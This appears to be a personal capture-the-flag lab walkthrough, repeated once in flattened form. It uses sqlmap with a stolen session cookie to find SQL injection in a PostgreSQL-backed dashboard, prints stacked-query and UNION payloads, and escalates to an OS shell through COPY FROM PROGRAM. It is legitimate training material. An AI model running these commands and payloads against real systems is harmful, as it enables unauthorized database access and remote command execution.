CMD INJECTION

#Identify vulnerable SQLi entry points
root@htb:~$ which sqlmap
 /usr/bin/sqlmap
 
root@htb:~$ sqlmap -hh
 ...
 Usage: python3 sqlmap [options]
 ...
 

root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php?search=null > F12 > Storage > Cookies > 
 PHPSESSID:rgqtj2q53rvk6mlva0plqu7tsu
 
 * the cookie is required for authentication
    - this implies that the logged in user has elevated privileges; admin

root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=rgqtj2q53rvk6mlva0plqu7tsu"

 ...
 [13:50:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
 it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
 for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] 
 
 [13:50:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [13:50:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [13:50:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
 [13:50:32] [WARNING] reflective value(s) found and filtering out
 [13:50:32] [INFO] target URL appears to have 5 columns in query
 [13:50:32] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
 ---
 Parameter: search (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=null';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
 ---
 [13:50:34] [INFO] the back-end DBMS is PostgreSQL
 web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
 web application technology: Apache 2.4.41
 back-end DBMS: PostgreSQL
 [13:50:34] [INFO] fetched data logged to text files under '/home/str1f3/.local/share/sqlmap/output/10.129.95.174'

 [*] ending @ 13:50:34 /2025-04-17/

#exploit the vulnerability w/ sqlmap's os injection flag
root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=i333q3ar3rlq5ms4sg4h6895sa" --os-shell

 [13:59:00] [INFO] resuming back-end DBMS 'postgresql' 
 [13:59:00] [INFO] testing connection to the target URL
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: search (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=null';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
 ---
 [13:59:00] [INFO] the back-end DBMS is PostgreSQL
 web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
 web application technology: Apache 2.4.41
 back-end DBMS: PostgreSQL
 [13:59:00] [INFO] fingerprinting the back-end DBMS operating system
 [13:59:00] [INFO] the back-end DBMS operating system is Linux
 [13:59:00] [INFO] testing if current user is DBA
 [13:59:00] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
 [13:59:00] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

PreviousSQLI NextSSH

Last updated 6 days ago

#Identify vulnerable SQLi entry points root@htb:~$ which sqlmap /usr/bin/sqlmap root@htb:~$ sqlmap -hh ... Usage: python3 sqlmap [options] ... root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php?search=null > F12 > Storage > Cookies > PHPSESSID:rgqtj2q53rvk6mlva0plqu7tsu * the cookie is required for authentication - this implies that the logged in user has elevated privileges; admin root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=rgqtj2q53rvk6mlva0plqu7tsu" ... [13:50:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] [13:50:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [13:50:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [13:50:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [13:50:32] [WARNING] reflective value(s) found and filtering out [13:50:32] [INFO] target URL appears to have 5 columns in query [13:50:32] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests: --- Parameter: search (GET) Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: search=null';SELECT PG_SLEEP(5)-- Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF --- [13:50:34] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal) web application technology: Apache 2.4.41 back-end DBMS: PostgreSQL [13:50:34] [INFO] fetched data logged to text files under '/home/str1f3/.local/share/sqlmap/output/10.129.95.174' [*] ending @ 13:50:34 /2025-04-17/

#exploit the vulnerability w/ sqlmap's os injection flag root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=i333q3ar3rlq5ms4sg4h6895sa" --os-shell [13:59:00] [INFO] resuming back-end DBMS 'postgresql' [13:59:00] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: search (GET) Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: search=null';SELECT PG_SLEEP(5)-- Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF --- [13:59:00] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal) web application technology: Apache 2.4.41 back-end DBMS: PostgreSQL [13:59:00] [INFO] fingerprinting the back-end DBMS operating system [13:59:00] [INFO] the back-end DBMS operating system is Linux [13:59:00] [INFO] testing if current user is DBA [13:59:00] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution [13:59:00] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER os-shell>